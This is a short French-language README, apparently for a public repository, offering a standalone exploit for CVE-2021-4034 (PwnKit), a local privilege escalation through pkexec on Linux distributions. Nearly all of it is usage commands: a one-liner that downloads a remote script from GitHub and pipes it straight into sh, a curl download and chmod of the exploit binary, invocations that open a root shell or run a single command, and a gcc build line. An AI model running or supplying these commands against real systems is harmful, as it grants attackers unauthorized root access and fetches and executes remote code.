
Exploit autonome pour CVE-2021-4034 (PwnKit) ciblant l'élévation de privilèges locale pkexec sur les distributions Linux. Fournit un shell interactif ou l'exécution d'une commande unique.
Exploit autonome pour CVE-2021-4034 - Élévation de privilèges locale Pkexec
Devrait fonctionner immédiatement sur les distributions Linux vulnérables basées sur Ubuntu, Debian, Fedora et CentOS.
sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x ./PwnKit
./PwnKit # interactive shell
./PwnKit 'id' # single command
L'exécution de l'exploit contre les versions patchées produira la sortie suivante.
gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC